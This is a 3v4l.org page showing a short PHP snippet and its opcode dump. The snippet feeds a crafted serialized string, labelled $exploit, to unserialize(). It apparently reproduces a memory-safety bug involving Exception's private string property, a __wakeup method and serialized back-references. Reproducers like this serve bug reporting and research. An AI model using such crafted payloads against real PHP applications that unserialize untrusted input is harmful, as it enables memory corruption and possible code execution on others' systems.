3v4l.org

run code in 200+ php & hhvm versions
Bugs & Features
<?php class obj { var $prop; function __wakeup() { $this->prop = 1; } } $exploit = 'a:3:{i:0;O:9:"exception":1:{s:17:"'."\0".'Exception'."\0".'string";a:1:{i:0;a:1:{i:0;i:1;}}}i:1;O:3:"obj":1:{s:4:"prop";R:2;}i:2;R:3;}'; $x = unserialize($exploit); for ($i = 0; $i < 5; $i++) { $v[$i] = 'hi'.$i; } var_dump($x);
based on KUTK2
Finding entry points
Branch analysis from position: 0
Jump found. Position 1 = 13
Branch analysis from position: 13
Jump found. Position 1 = 15, Position 2 = 8
Branch analysis from position: 15
Jump found. Position 1 = -2
Branch analysis from position: 8
Jump found. Position 1 = 15, Position 2 = 8
Branch analysis from position: 15
Branch analysis from position: 8
filename:       /in/I9tvP
function name:  (null)
number of ops:  19
compiled vars:  !0 = $exploit, !1 = $x, !2 = $i, !3 = $v
line     #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
   3     0  E >   NOP                                                      
  10     1        ASSIGN                                                   !0, 'a%3A3%3A%7Bi%3A0%3BO%3A9%3A%22exception%22%3A1%3A%7Bs%3A17%3A%22%00Exception%00string%22%3Ba%3A1%3A%7Bi%3A0%3Ba%3A1%3A%7Bi%3A0%3Bi%3A1%3B%7D%7D%7Di%3A1%3BO%3A3%3A%22obj%22%3A1%3A%7Bs%3A4%3A%22prop%22%3BR%3A2%3B%7Di%3A2%3BR%3A3%3B%7D'
  11     2        INIT_FCALL                                               'unserialize'
         3        SEND_VAR                                                 !0
         4        DO_ICALL                                         $6      
         5        ASSIGN                                                   !1, $6
  13     6        ASSIGN                                                   !2, 0
         7      > JMP                                                      ->13
  14     8    >   CONCAT                                           ~10     'hi', !2
         9        ASSIGN_DIM                                               !3, !2
        10        OP_DATA                                                  ~10
  13    11        POST_INC                                         ~11     !2
        12        FREE                                                     ~11
        13    >   IS_SMALLER                                       ~12     !2, 5
        14      > JMPNZ                                                    ~12, ->8
  17    15    >   INIT_FCALL                                               'var_dump'
        16        SEND_VAR                                                 !1
        17        DO_ICALL                                                 
        18      > RETURN                                                   1

Class obj:
Function __wakeup:
Finding entry points
Branch analysis from position: 0
Jump found. Position 1 = -2
filename:       /in/I9tvP
function name:  __wakeup
number of ops:  3
compiled vars:  none
line     #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
   6     0  E >   ASSIGN_OBJ                                               'prop'
         1        OP_DATA                                                  1
   7     2      > RETURN                                                   null

End of function __wakeup

End of class obj.

Generated using Vulcan Logic Dumper, using php 7.1.0